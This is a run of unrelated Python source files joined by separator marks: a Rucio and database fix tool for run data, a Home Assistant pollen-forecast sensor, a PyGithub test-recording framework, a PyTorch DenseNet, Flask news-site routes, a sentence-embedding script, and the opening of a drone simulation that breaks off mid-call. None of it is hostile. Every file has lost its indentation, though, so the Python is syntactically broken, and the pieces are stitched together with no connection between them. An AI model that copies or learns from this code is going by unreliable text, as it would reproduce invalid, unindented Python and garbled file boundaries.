deleted_any_rule = False
for rse in self.RSES:
rucio_rule = self.rc.GetRule(upload_structure=did, rse=rse)
if rucio_rule['exists']:
print("Deleting rucio rule = ", rucio_rule['id'], "from RSE = ",rse)
self.rc.DeleteRule(rucio_rule['id'])
deleted_any_rule = True
# If some rule has been deleted, wait for 1 hour (plus 5 minutes of margin)
if deleted_any_rule:
delay = 3600+60*5
print("We have to wait for {0} seconds before proceeding to the next step".format(delay))
time.sleep(delay)
else:
print("There is no rule to delete")
# Third action: set the EB status as 'eb_ready_to_upload'
self.db.db.find_one_and_update({'_id': run['_id'],'data': {'$elemMatch': datum}},
{'$set': {'data.$.status': 'eb_ready_to_upload'}})
print("EB status changed to eb_ready_to_upload")
# Reload the run
run = self.db.db.find_one({'number' : number})
# Gets the status
if 'status' in run:
print('New run status: {0}'.format(run['status']))
else:
print('Ru status: {0}'.format('Not available'))
# Get the EB datum and its status
ebstatus = ""
datum = None
for d in run['data']:
if d['type'] == dtype and eb in d['host']:
datum = d
if 'status' in d:
ebstatus = d['status']
# Prints the eb status as a confirmation of the performed change
if ebstatus != "":
print('New EB status: {0}'.format(ebstatus))
else:
print('New EB status: not available')
def add_rule(self,did,from_rse,to_rse):
hash = did.split('-')[-1]
dtype = did.split('-')[0].split(':')[-1]
number = int(did.split(':')[0].split('_')[-1])
print("Adding a new rule {0} from {1} to {2}".format(did,from_rse,to_rse))
print("Run number: {0}".format(number))
print("Data type: {0}".format(dtype))
print("Hash: {0}".format(hash))
run = self.db.db.find_one({'number' : number})
# Gets the status
if 'status' in run:
print('Run status: {0}'.format(run['status']))
else:
print('Run status: {0}'.format('Not available'))
#Checks if the datum of the sender exists in the DB
datum = None
for d in run['data']:
if d['type'] == dtype and d['host'] == 'rucio-catalogue' and d['location'] == from_rse:
datum = d
break
if datum is None:
print('The datum concerning data type {0} and site {1} is missing in the DB. Forced to stop'.format(dtype,from_rse))
return(0)
# Checks the rule status of the sender RSE
rucio_rule = self.rc.GetRule(upload_structure=did, rse=from_rse)
if rucio_rule['state'] != 'OK' and rucio_rule['state'] != 'REPLICATING':
print('The rule in {0} is neither OK nor REPLICATING. Forced to stop'.format(from_rse))
return(0)
# set the new rule
if not self.skip_rucio:
print("Adding the Rucio rule")
self.rc.AddConditionalRule(did, from_rse, to_rse, lifetime=None, priority=self.priority)
else:
print("Rucio rule is not added")
rucio_rule = self.rc.GetRule(did, rse=to_rse)
# Update run status
self.db.db.find_one_and_update({'number': number},{'$set': {'status': 'transferring'}})
# Add a new datum in the run document
updated_fields = {'host': "rucio-catalogue",
'type': dtype,
'location': to_rse,
'lifetime': rucio_rule['expires'],
'status': 'transferring',
'did': did,
'protocol': 'rucio'
}
data_dict = datum.copy()
data_dict.update(updated_fields)
self.db.AddDatafield(run['_id'], data_dict)
print("Done.")
def delete_rule(self,did,rse):
hash = did.split('-')[-1]
dtype = did.split('-')[0].split(':')[-1]
number = int(did.split(':')[0].split('_')[-1])
print("Deleting the rule {0} from {1}".format(did,rse))
print("Run number: {0}".format(number))
print("Data type: {0}".format(dtype))
print("Hash: {0}".format(hash))
run = self.db.db.find_one({'number' : number})
#Checks if the datum exists in the DB
datum = None
for d in run['data']:
if d['type'] == dtype and d['host'] == 'rucio-catalogue' and d['location'] == rse:
datum = d
break
#Delete the datum
if datum is not None:
self.db.RemoveDatafield(run['_id'],datum)
print("Datum deleted in DB.")
else:
print('There is no datum to delete')
#Get the rule of a given DID
rucio_rule = self.rc.GetRule(upload_structure=did, rse=rse)
#Delete the rule
if rucio_rule['exists']:
self.rc.DeleteRule(rucio_rule['id'])
print("Rucio rule deleted.")
else:
print('There is no Rucio rule to delete')
print("Done.")
def delete_db_datum(self,did,site):
hash = did.split('-')[-1]
dtype = did.split('-')[0].split(':')[-1]
number = int(did.split(':')[0].split('_')[-1])
print("Removing the datum from DB for the DID: {0} and from the site {1}".format(did,site))
print("Run number: {0}".format(number))
print("Data type: {0}".format(dtype))
print("Hash: {0}".format(hash))
print("Site: {0}".format(site))
run = self.db.db.find_one({'number' : number})
# Get the EB datum and its status
datum = None
for d in run['data']:
if 'eb' in site:
if d['type'] == dtype and site in d['host'] and 'xenon.local' in d['host']:
datum = d
break
else:
if d['type'] == dtype and d['host']=='rucio-catalogue' and d['location']==site:
datum = d
break
if datum is not None:
self.db.RemoveDatafield(run['_id'],datum)
print("Done.")
else:
print('There is no datum. Nothing has been deleted')
def set_run_status(self,number,status):
number = int(number)
print("Setting the status of run {0} to the value {1}".format(number,status))
run = self.db.db.find_one({'number' : number})
print("status before = ",run['status'])
self.db.db.find_one_and_update({'_id': run['_id']},{'$set':{"status": status}})
run = self.db.db.find_one({'number' : number})
print("status after = ",run['status'])
def set_eb_status(self,did,status):
print("Setting the EB status of DID {0} to the value {1}".format(did,status))
hash = did.split('-')[-1]
dtype = did.split('-')[0].split(':')[-1]
number = int(did.split(':')[0].split('_')[-1])
print("Run number: {0}".format(number))
print("Data type: {0}".format(dtype))
print("Hash: {0}".format(hash))
run = self.db.db.find_one({'number' : number})
# Extracts the correct Event Builder machine who processed this run
# Then also the bootstrax state and, in case it was abandoned, the reason
if 'bootstrax' in run:
bootstrax = run['bootstrax']
eb = bootstrax['host'].split('.')[0]
else:
print('Not processed')
return(0)
# Get the EB datum and its status
ebstatus = ""
datum = None
for d in run['data']:
if d['type'] == dtype and eb in d['host']:
datum = d
if 'status' in d:
ebstatus = d['status']
if datum is None:
print('There is no EB datum.')
return(0)
if ebstatus != "":
print("EB status before = ",ebstatus)
else:
print("EB status absent before")
#Set the aimed value
self.db.db.find_one_and_update({'_id': run['_id'],'data': {'$elemMatch': datum}},
{'$set': {'data.$.status': status}})
run = self.db.db.find_one({'number' : number})
# Get the EB datum and its status
ebstatus = ""
datum = None
for d in run['data']:
if d['type'] == dtype and eb in d['host']:
datum = d
if 'status' in d:
ebstatus = d['status']
print("EB status after = ",ebstatus)
def __del__(self):
pass
def main():
parser = ArgumentParser("admix-fix")
config = Config()
# parser.add_argument("--number", type=int, help="Run number to fix", default=-1)
# parser.add_argument("--dtype", help="Data type to fix", default="")
# parser.add_argument("--did", help="DID to fix")
# parser.add_argument("--action", help="Which action you want to take")
# parser.add_argument("--fromrse", help="From which RSE you want to copy data")
# parser.add_argument("--torse", help="To which RSE you want to copy data")
parser.add_argument("--reset_upload", nargs=1, help="Deletes everything related a given DID, exept data in EB. The deletion includes the entries in the Rucio catalogue and the related data in the DB rundoc. This is ideal if you want to retry an upload that failed", metavar=('DID'))
parser.add_argument("--add_rule", nargs=3, help="Add a new replication rule of a given DID from one RSE to another one. The rundoc in DB is updated with a new datum as well", metavar=('DID','FROM_RSE','TO_RSE'))
parser.add_argument("--delete_rule", nargs=2, help="Delete a replication rule of a given DID from one RSE. The rundoc in DB is deleted as well", metavar=('DID','RSE'))
parser.add_argument("--delete_db_datum", nargs=2, help="Deletes the db datum corresponding to a given DID. The SITE can be either a specific EB machine (ex: eb1) or a specific RSE", metavar=('DID','SITE'))
parser.add_argument("--set_run_status", nargs=2, help="Set the run status to a given NAME (typical case is to set it to eb_ready_to_upload)", metavar=('RUN_NUMBER','STATUS_NAME'))
parser.add_argument("--set_eb_status", nargs=2, help="Set the EB status of a given DID to a given NAME", metavar=('DID','STATUS_NAME'))
parser.add_argument("--priority", type=int, help="Priority to assign to Rucio rules (default: %(default)s)", default=3)
parser.add_argument("--skip_rucio", help="Add this flag in context of add_rule in case you just want to update DB since Rucio rule exists already", action='store_true')
args = parser.parse_args()
helper.make_global("admix_config", os.path.abspath(config.get('Admix','config_file')))
fix = Fix()
fix.skip_rucio = args.skip_rucio
fix.priority = args.priority
try:
if args.reset_upload:
fix.reset_upload(args.reset_upload[0])
if args.add_rule:
fix.add_rule(args.add_rule[0],args.add_rule[1],args.add_rule[2])
if args.delete_rule:
fix.delete_rule(args.delete_rule[0],args.delete_rule[1])
if args.delete_db_datum:
fix.delete_db_datum(args.delete_db_datum[0],args.delete_db_datum[1])
if args.set_run_status:
fix.set_run_status(args.set_run_status[0],args.set_run_status[1])
if args.set_eb_status:
fix.set_eb_status(args.set_eb_status[0],args.set_eb_status[1])
# if args.action == "reset_upload" and args.did:
# fix.reset_upload(args.did)
# if args.action == "add_rule" and args.did and args.fromrse and args.torse:
# fix.add_rule(args.did,args.fromrse,args.torse)
print("")
except KeyboardInterrupt:
return 0
|
import logging
from datetime import timedelta
from homeassistant.components.sensor import SensorEntity
from homeassistant.const import (ATTR_IDENTIFIERS, ATTR_MANUFACTURER,
ATTR_MODEL, ATTR_NAME)
from homeassistant.util.dt import utcnow
from .const import CONF_REGION_ID, DOMAIN
ATTR_VAL_TOMORROW = "state_tomorrow"
ATTR_VAL_IN_2_DAYS = "state_in_2_days"
ATTR_DESC_TODAY = "state_today_desc"
ATTR_DESC_TOMORROW = "state_tomorrow_desc"
ATTR_DESC_IN_2_DAYS = "state_in_2_days_desc"
ATTR_LAST_UPDATE = "last_update"
ATTR_NEXT_UPDATE = "next_update"
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up platform for a new integration.
Called by the HA framework after async_setup_platforms has been called
during initialization of a new integration.
"""
region_id = config_entry.data[CONF_REGION_ID]
source = hass.data[DOMAIN].source
entities = []
names = set()
for pollen in source.pollen_list:
if pollen.region_id == region_id and pollen.name not in names:
names.add(pollen.name)
entities.append(
PollenflugSensorEntity(hass, source, region_id, pollen.name)
)
async_add_entities(entities)
class PollenflugSensorEntity(SensorEntity):
"""Common functionality for all pollenflug entities."""
def __init__(self, hass, source, region_id, pollen_name):
self._source = source
self._region_id = region_id
self._pollen_name = pollen_name
self._value = None
self._update_sensor_listener = None
# set HA instance attributes directly (don't use property)
self._attr_unique_id = f"{DOMAIN}_{pollen_name}_{region_id}"
self._attr_name = f"Pollenflug {pollen_name} {region_id}"
self._attr_icon = "mdi:flower-pollen"
self._attr_device_info = {
ATTR_IDENTIFIERS: {(DOMAIN, region_id)},
ATTR_NAME: "Pollenflug-Gefahrenindex",
ATTR_MANUFACTURER: source.sender,
ATTR_MODEL: source.regions_list[region_id].name,
"entry_type": "service",
}
async def async_update(self):
"""Update the value of the entity."""
today = utcnow().date()
# reset value and extra_state_attributes
val_today = None
val_tomorrow = None
val_in_2_days = None
for pollen in self._source.pollen_list:
if pollen.region_id == self._region_id and pollen.name == self._pollen_name:
if pollen.date == today:
val_today = pollen.value
elif pollen.date == today + timedelta(days=1):
val_tomorrow = pollen.value
elif pollen.date == today + timedelta(days=2):
val_in_2_days = pollen.value
self._value = val_today
attributes = {
ATTR_VAL_TOMORROW: val_tomorrow,
ATTR_VAL_IN_2_DAYS: val_in_2_days,
ATTR_DESC_TODAY: self._source.legend.get(val_today),
ATTR_DESC_TOMORROW: self._source.legend.get(val_tomorrow),
ATTR_DESC_IN_2_DAYS: self._source.legend.get(val_in_2_days),
ATTR_LAST_UPDATE: self._source.last_update,
ATTR_NEXT_UPDATE: self._source.next_update,
}
self._attr_extra_state_attributes = attributes
# return last update in local timezone
self._attr_attribution = f"Last update: {self._source.last_update.astimezone()}"
@property
def available(self):
"""Return true if value is valid."""
return self._value is not None
@property
def native_value(self):
"""Return the value of the entity."""
return self._value
|
# -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 <NAME> <<EMAIL>> #
# Copyright 2012 Zearin <<EMAIL>> #
# Copyright 2013 AKFish <<EMAIL>> #
# Copyright 2013 <NAME> <<EMAIL>> #
# #
# This file is part of PyGithub. #
# http://pygithub.github.io/PyGithub/v1/index.html #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import os
import sys
import unittest
import httplib
import traceback
import github
atLeastPython26 = sys.hexversion >= 0x02060000
atLeastPython3 = sys.hexversion >= 0x03000000
atMostPython32 = sys.hexversion < 0x03030000
if atLeastPython26:
import json
else: # pragma no cover (Covered by all tests with Python 2.5)
import simplejson as json # pragma no cover (Covered by all tests with Python 2.5)
def readLine(file):
if atLeastPython3:
return file.readline().decode("utf-8").strip()
else:
return file.readline().strip()
class FakeHttpResponse:
def __init__(self, status, headers, output):
self.status = status
self.__headers = headers
self.__output = output
def getheaders(self):
return self.__headers
def read(self):
return self.__output
def fixAuthorizationHeader(headers):
if "Authorization" in headers:
if headers["Authorization"].endswith("ZmFrZV9sb2dpbjpmYWtlX3Bhc3N3b3Jk"):
# This special case is here to test the real Authorization header
# sent by PyGithub. It would have avoided issue https://github.com/jacquev6/PyGithub/issues/153
# because we would have seen that Python 3 was not generating the same
# header as Python 2
pass
elif headers["Authorization"].startswith("token "):
headers["Authorization"] = "token private_token_<PASSWORD>"
elif headers["Authorization"].startswith("Basic "):
headers["Authorization"] = "Basic login_and_password_removed"
class RecordingConnection: # pragma no cover (Class useful only when recording new tests, not used during automated tests)
def __init__(self, file, protocol, host, port, *args, **kwds):
self.__file = file
self.__protocol = protocol
self.__host = host
self.__port = str(port)
self.__cnx = self._realConnection(host, port, *args, **kwds)
def request(self, verb, url, input, headers):
print verb, url, input, headers,
self.__cnx.request(verb, url, input, headers)
fixAuthorizationHeader(headers)
self.__writeLine(self.__protocol)
self.__writeLine(verb)
self.__writeLine(self.__host)
self.__writeLine(self.__port)
self.__writeLine(url)
self.__writeLine(str(headers))
self.__writeLine(input.replace('\n', '').replace('\r', ''))
def getresponse(self):
res = self.__cnx.getresponse()
status = res.status
print "=>", status
headers = res.getheaders()
output = res.read()
self.__writeLine(str(status))
self.__writeLine(str(headers))
self.__writeLine(str(output))
return FakeHttpResponse(status, headers, output)
def close(self):
self.__writeLine("")
return self.__cnx.close()
def __writeLine(self, line):
self.__file.write(line + "\n")
class RecordingHttpConnection(RecordingConnection): # pragma no cover (Class useful only when recording new tests, not used during automated tests)
_realConnection = httplib.HTTPConnection
def __init__(self, file, *args, **kwds):
RecordingConnection.__init__(self, file, "http", *args, **kwds)
class RecordingHttpsConnection(RecordingConnection): # pragma no cover (Class useful only when recording new tests, not used during automated tests)
_realConnection = httplib.HTTPSConnection
def __init__(self, file, *args, **kwds):
RecordingConnection.__init__(self, file, "https", *args, **kwds)
class ReplayingConnection:
def __init__(self, testCase, file, protocol, host, port, *args, **kwds):
self.__testCase = testCase
self.__file = file
self.__protocol = protocol
self.__host = host
self.__port = str(port)
def request(self, verb, url, input, headers):
fixAuthorizationHeader(headers)
self.__testCase.assertEqual(self.__protocol, readLine(self.__file))
self.__testCase.assertEqual(verb, readLine(self.__file))
self.__testCase.assertEqual(self.__host, readLine(self.__file))
self.__testCase.assertEqual(self.__port, readLine(self.__file))
self.__testCase.assertEqual(self.__splitUrl(url), self.__splitUrl(readLine(self.__file)))
self.__testCase.assertEqual(headers, eval(readLine(self.__file)))
expectedInput = readLine(self.__file)
if input.startswith("{"):
self.__testCase.assertEqual(json.loads(input.replace('\n', '').replace('\r', '')), json.loads(expectedInput))
elif atMostPython32: # @todo Test in all cases, including Python 3.3
# In Python 3.3, dicts are not output in the same order as in Python 2.5 -> 3.2.
# So, form-data encoding is not deterministic and is difficult to test.
self.__testCase.assertEqual(input.replace('\n', '').replace('\r', ''), expectedInput)
def __splitUrl(self, url):
splitedUrl = url.split("?")
if len(splitedUrl) == 1:
return splitedUrl
self.__testCase.assertEqual(len(splitedUrl), 2)
base, qs = splitedUrl
return (base, sorted(qs.split("&")))
def getresponse(self):
status = int(readLine(self.__file))
headers = eval(readLine(self.__file))
output = readLine(self.__file)
return FakeHttpResponse(status, headers, output)
def close(self):
readLine(self.__file)
def ReplayingHttpConnection(testCase, file, *args, **kwds):
return ReplayingConnection(testCase, file, "http", *args, **kwds)
def ReplayingHttpsConnection(testCase, file, *args, **kwds):
return ReplayingConnection(testCase, file, "https", *args, **kwds)
class BasicTestCase(unittest.TestCase):
recordMode = False
tokenAuthMode = False
def setUp(self):
unittest.TestCase.setUp(self)
self.__fileName = ""
self.__file = None
if self.recordMode: # pragma no cover (Branch useful only when recording new tests, not used during automated tests)
github.Requester.Requester.injectConnectionClasses(
lambda ignored, *args, **kwds: RecordingHttpConnection(self.__openFile("wb"), *args, **kwds),
lambda ignored, *args, **kwds: RecordingHttpsConnection(self.__openFile("wb"), *args, **kwds)
)
import GithubCredentials
self.login = GithubCredentials.login
self.password = <PASSWORD>
self.oauth_token = GithubCredentials.oauth_token
# @todo Remove client_id and client_secret from ReplayData (as we already remove login, password and oauth_token)
# self.client_id = GithubCredentials.client_id
# self.client_secret = GithubCredentials.client_secret
else:
github.Requester.Requester.injectConnectionClasses(
lambda ignored, *args, **kwds: ReplayingHttpConnection(self, self.__openFile("rb"), *args, **kwds),
lambda ignored, *args, **kwds: ReplayingHttpsConnection(self, self.__openFile("rb"), *args, **kwds)
)
self.login = "login"
self.password = "password"
self.oauth_token = "oauth_token"
self.client_id = "client_id"
self.client_secret = "client_secret"
def tearDown(self):
unittest.TestCase.tearDown(self)
self.__closeReplayFileIfNeeded()
github.Requester.Requester.resetConnectionClasses()
def __openFile(self, mode):
for (_, _, functionName, _) in traceback.extract_stack():
if functionName.startswith("test") or functionName == "setUp" or functionName == "tearDown":
if functionName != "test": # because in class Hook(Framework.TestCase), method testTest calls Hook.test
fileName = os.path.join(os.path.dirname(__file__), "ReplayData", self.__class__.__name__ + "." + functionName + ".txt")
if fileName != self.__fileName:
self.__closeReplayFileIfNeeded()
self.__fileName = fileName
self.__file = open(self.__fileName, mode)
return self.__file
def __closeReplayFileIfNeeded(self):
if self.__file is not None:
if not self.recordMode: # pragma no branch (Branch useful only when recording new tests, not used during automated tests)
self.assertEqual(readLine(self.__file), "")
self.__file.close()
def assertListKeyEqual(self, elements, key, expectedKeys):
realKeys = [key(element) for element in elements]
self.assertEqual(realKeys, expectedKeys)
def assertListKeyBegin(self, elements, key, expectedKeys):
realKeys = [key(element) for element in elements[: len(expectedKeys)]]
self.assertEqual(realKeys, expectedKeys)
class TestCase(BasicTestCase):
def doCheckFrame(self, obj, frame):
if obj._headers == {} and frame is None:
return
if obj._headers is None and frame == {}:
return
self.assertEqual(obj._headers, frame[2])
def getFrameChecker(self):
return lambda requester, obj, frame: self.doCheckFrame(obj, frame)
def setUp(self):
BasicTestCase.setUp(self)
# Set up frame debugging
github.GithubObject.GithubObject.setCheckAfterInitFlag(True)
github.Requester.Requester.setDebugFlag(True)
github.Requester.Requester.setOnCheckMe(self.getFrameChecker())
if self.tokenAuthMode:
self.g = github.Github(self.oauth_token)
else:
self.g = github.Github(self.login, self.password)
def activateRecordMode(): # pragma no cover (Function useful only when recording new tests, not used during automated tests)
BasicTestCase.recordMode = True
def activateTokenAuthMode(): # pragma no cover (Function useful only when recording new tests, not used during automated tests)
BasicTestCase.tokenAuthMode = True
|
# -*- coding: UTF-8 -*-
"""
An unofficial implementation of DenseNet with pytorch
@<NAME> 2020_09_15
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
from models.blocks.conv_bn import BN_Conv2d
from models.blocks.dense_block import DenseBlock, CSP_DenseBlock
class DenseNet(nn.Module):
def __init__(self, layers: object, k, theta, num_classes, part_ratio=0) -> object:
super(DenseNet, self).__init__()
# params
self.layers = layers
self.k = k
self.theta = theta
self.Block = DenseBlock if part_ratio == 0 else CSP_DenseBlock # 通过part_tatio参数控制block type
# layers
self.conv = BN_Conv2d(3, 2 * k, 7, 2, 3)
self.blocks, patches = self.__make_blocks(2 * k)
self.fc = nn.Linear(patches, num_classes)
def __make_transition(self, in_chls):
out_chls = int(self.theta * in_chls)
return nn.Sequential(
BN_Conv2d(in_chls, out_chls, 1, 1, 0),
nn.AvgPool2d(2)
), out_chls
def __make_blocks(self, k0):
"""
make block-transition structures
:param k0:
:return:
"""
layers_list = []
patches = 0
for i in range(len(self.layers)):
layers_list.append(self.Block(k0, self.layers[i], self.k))
patches = k0 + self.layers[i] * self.k # output feature patches from Dense Block
if i != len(self.layers) - 1:
transition, k0 = self.__make_transition(patches)
layers_list.append(transition)
return nn.Sequential(*layers_list), patches
def forward(self, x):
out = self.conv(x)
out = F.max_pool2d(out, 3, 2, 1)
# print(out.shape)
out = self.blocks(out)
# print(out.shape)
out = F.avg_pool2d(out, 7)
# print(out.shape)
out = out.view(out.size(0), -1)
# out = F.softmax(self.fc(out))
out = self.fc(out)
return out
def densenet_121(num_classes=1000):
return DenseNet([6, 12, 24, 16], k=32, theta=0.5, num_classes=num_classes)
def densenet_169(num_classes=1000):
return DenseNet([6, 12, 32, 32], k=32, theta=0.5, num_classes=num_classes)
def densenet_201(num_classes=1000):
return DenseNet([6, 12, 48, 32], k=32, theta=0.5, num_classes=num_classes)
def densenet_264(num_classes=1000):
return DenseNet([6, 12, 64, 48], k=32, theta=0.5, num_classes=num_classes)
def csp_densenet_121(num_classes=1000):
return DenseNet([6, 12, 24, 16], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
def csp_densenet_169(num_classes=1000):
return DenseNet([6, 12, 32, 32], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
def csp_densenet_201(num_classes=1000):
return DenseNet([6, 12, 48, 32], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
def csp_densenet_264(num_classes=1000):
return DenseNet([6, 12, 64, 48], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
# def test():
# net = densenet_264()
# summary(net, (3, 224, 224))
# x = torch.randn((2, 3, 224, 224))
# y = net(x)
# print(y.shape)
#
#
# test()
|
<gh_stars>0
from flask import render_template,request,redirect,url_for
from . import main
from ..requests import get_news,get_article,search_news,source_news
from ..models import Article,News
@main.route('/')
def index():
'''
view root function that return the index page
'''
news = get_article('business')
title = 'Welcome to The news highlight'
search_news = request.args.get('query')
if search_news:
return redirect(url_for('.search', query=search_news))
else:
return render_template('index.html',title = title, article=news)
@main.route('/sports')
def sport():
'''
View root page function that returns the index page and its data
'''
sport = get_article('sports')
title = 'general-news Page - Get The latest News Online'
return render_template('sports.html',title = title,article=sport)
@main.route('/technology')
def tech():
'''
View root page function that returns the index page and its data
'''
technology = get_article('technology')
title = 'general-news Page - Get The latest News Online'
return render_template('technology.html',title = title,article=technology)
@main.route('/business')
def business():
'''
View root page function that returns the index page and its data
'''
business = get_article('business')
title = 'general-news Page - Get The latest News Online'
return render_template('business.html',title = title,article=business)
@main.route('/entertainment')
def entertainment():
'''
View root page function that returns the index page and its data
'''
# Getting popular news
entertainment = get_article('entertainment')
title = 'general-news Page - Get The latest News Online'
return render_template('entertainment.html',title = title,article=entertainment)
@main.route('/search/<query>')
def search(query):
'''
view function to display search results
'''
article_list = query.split(" ")
query_format = "+".join(article_list)
searched_articles = search_news(query_format)
title = f'search results for {query}'
return render_template('search.html', article= searched_articles)
@main.route('/nation')
def nation():
'''
View root page function that returns the index page and its data
'''
nation = source_news('nation.co.ke')
title = 'general-news Page - Get The latest News Online'
return render_template('articles.html',title = title,article=nation)
@main.route('/standard')
def standard():
'''
View root page function that returns the index page and its data
'''
standard = source_news('standardmedia.co.ke')
title = 'general-news Page - Get The latest News Online'
return render_template('articles.html',title = title,article=standard)
@main.route('/cnn')
def cnn():
'''
View root page function that returns the index page and its data
'''
cnn = source_news('cnn.com')
title = 'general-news Page - Get The latest News Online'
return render_template('articles.html',title = title,article=cnn)
@main.route('/bbc')
def bbc():
'''
View root page function that returns the index page and its data
'''
bbc = source_news('bbc.com')
title = 'general-news Page - Get The latest News Online'
return render_template('articles.html',title = title,article=bbc)
@main.route('/theeast')
def east():
'''
View root page function that returns the index page and its data
'''
ea = source_news('theeastafrican.co.ke')
title = 'general-news Page - Get The latest News Online'
return render_template('articles.html',title = title,article=ea)
@main.route('/aljazeera')
def aljazeera():
'''
View root page function that returns the index page and its data
'''
aljazeera = source_news('aljazeera.com')
title = 'general-news Page - Get The latest News Online'
return render_template('articles.html',title = title,article=aljazeera)
@main.route('/forbes')
def forbes():
'''
View root page function that returns the index page and its data
'''
forbes = source_news('forbes.com')
title = 'general-news Page - Get The latest News Online'
return render_template('articles.html',title = title,article=forbes)
|
<filename>create_sentence_representation.py<gh_stars>1-10
import torch
import sys
import numpy as np
import scipy.io
import pickle
import os
from get_dict import get_missing, get_missing_counts, find_missing_sentences, update_dict
import argparse
def process_sentence(vocab, typ, num_layers):
nsentences = len(vocab)
print("number of sentences: " + str(nsentences))
print('mixing sentences...')
sentence_rep = [[] for _ in range(num_layers)]
for sen in vocab:
one_sent = [[] for _ in range(num_layers)]
for token in sen:
for layer in range(len(token)):
one_sent[layer].append(np.array(token[layer]))
for lay in range(len(one_sent)):
if typ == "avg":
sentence_rep[lay].append(np.mean(one_sent[lay], axis=0))
elif typ == "max":
sentence_rep[lay].append(np.array(one_sent[lay]).max(axis=0))
elif typ == "min":
sentence_rep[lay].append(np.array(one_sent[lay]).min(axis=0))
elif typ == "last":
sentence_rep[lay].append(np.array(one_sent[lay][-1]))
# print("DOUBLE CHECK")
# print(len(sentence_rep))
# print(len(sentence_rep[0]))
# print(len(sentence_rep[0][0]))
return sentence_rep
def save_to_mat(title, arr, bool_labels, method):
print("\ncreating " + method + " matrix...")
for layer_num in range(len(arr)):
print("processing LAYER " + str(layer_num + 1) + "...")
layer_dict = {}
mat_title = "layer" + str(layer_num + 1) + "-" + str(method) + ".mat"
for i in range(len(arr[layer_num])):
sentence_label = "sentence" + str(i + 1)
bool_label = bool_labels[i]
embed = arr[layer_num][i]
tup = [bool_label]
tup.extend(embed)
layer_dict[sentence_label] = tup
scipy.io.savemat(title + "-" + mat_title, mdict=layer_dict)
return
def get_missing_bools(model, file_name):
get_dict_vocab = torch.load(model)
print("IF ONLY 50k")
top_50k_missing = get_missing(get_dict_vocab, file_name, top_50k = True)
top_50k_missing_dict, top_50k_sentences = get_missing_counts(top_50k_missing, file_name)
top_50k_sentences_with_missing, top_50k_missing_bools = find_missing_sentences(top_50k_missing_dict, top_50k_sentences, verbose = False)
print("NUMBER OF TOP 50K MISSING SENTENCES:", len(top_50k_sentences_with_missing))
return top_50k_missing_bools
def main():
# get input
argparser = argparse.ArgumentParser(description="create sentence representations for OpenNMT-py embeddings")
argparser.add_argument("-num_layers", '--num_layers', type=int, default=4, help="num_layers")
argparser.add_argument("-word_vocab", '--word_vocab', type=str, help="file path of the word model", required=True)
argparser.add_argument("-model", '--model', type=str, help="file path of the prediction model", required=True)
args = argparser.parse_args()
### GET MODEL VOCAB DICTIONARY
sent_file_name = "cleaned_examplesGLM.txt"
without_pt = args.model.split("/")[-1].split(".")[0]
methods = ['avg', 'max', 'min', 'last']
if not os.path.exists('embeddings/' + without_pt):
for method in methods:
os.makedirs('embeddings/' + without_pt + '/' + method)
print(without_pt)
print(args.model)
print('loading model...')
vocab = torch.load(args.model)
avg_sentence = process_sentence(vocab, "avg", args.num_layers)
max_sentence = process_sentence(vocab, "max", args.num_layers)
min_sentence = process_sentence(vocab, "min", args.num_layers)
last_sentence = process_sentence(vocab, "last", args.num_layers)
mats = [avg_sentence, max_sentence, min_sentence, last_sentence]
bool_labels = get_missing_bools(args.word_vocab, sent_file_name)
for i in range(len(methods)):
save_to_mat("embeddings/" + without_pt + '/' + methods[i] + '/', mats[i], bool_labels, methods[i])
print("done.")
return
if __name__ == "__main__":
main() |
"""Simulation script for assignment 2.
The script uses the control defined in file `aer1216_fall2020_hw2_ctrl.py`.
Example
-------
To run the simulation, type in a terminal:
$ python aer1216_fall2020_hw2_sim.py
"""
import time
import random
import numpy as np
import pybullet as p
#### Uncomment the following 2 lines if "module gym_pybullet_drones cannot be found"
# import sys
# sys.path.append('../')
from gym_pybullet_drones.envs.CtrlAviary import CtrlAviary
from gym_pybullet_drones.utils.Logger import Logger
from gym_pybullet_drones.utils.utils import sync
from gym_pybullet_drones.envs.BaseAviary import DroneModel
from aer1216_fall2020_hw2_ctrl import HW2Control
DURATION = 30
"""int: The duration of the simulation in seconds."""
GUI = True
"""bool: Whether to use PyBullet graphical interface."""
RECORD = False
"""bool: Whether to save a video under /files/videos. Requires ffmpeg"""
if __name__ == "__main__":
#### Create the ENVironment ################################
ENV = CtrlAviary(num_drones=3,
drone_model=DroneModel.CF2P,
initial_xyzs=np.array([ [.0, .0, .15], [-.3, .0, .15], [.3, .0, .15] ]),
gui=GUI,
record=RECORD
)
PYB_CLIENT = ENV.getPyBulletClient()
#### Initialize the LOGGER #################################
LOGGER = Logger(logging_freq_hz=ENV.SIM_FREQ,
num_drones=3,
)
#### Initialize the CONTROLLERS ############################
CTRL_0 = HW2Control(env=ENV,
control_type=0
)
CTRL_1 = HW2Control(env=ENV,
control_type=1
)
CTRL_2 = HW2Control(env=ENV,
control_type=2
)
#### Initialize the ACTION #################################
ACTION = {}
OBS = ENV.reset()
STATE = OBS["0"]["state"]
ACTION["0"] = CTRL_0.compute_control(current_position=STATE[0:3],
current_velocity=STATE[10:13],
current_rpy=STATE[7:10],
target_position=STATE[0:3],
target_velocity=np.zeros(3),
target_acceleration=np.zeros(3)
)
STATE = OBS["1"]["state"]
ACTION["1"] = CTRL_1.compute_control(current_position=STATE[0:3],
current_velocity=STATE[10:13],
current_rpy=STATE[7:10],
target_position=STATE[0:3],
target_velocity=np.zeros(3),
target_acceleration=np.zeros(3)
)
STATE = OBS["2"]["state"]
ACTION["2"] = CTRL_2.compute_control(current_position=STATE[0:3],
current_velocity=STATE[10:13],
current_rpy=STATE[7:10],
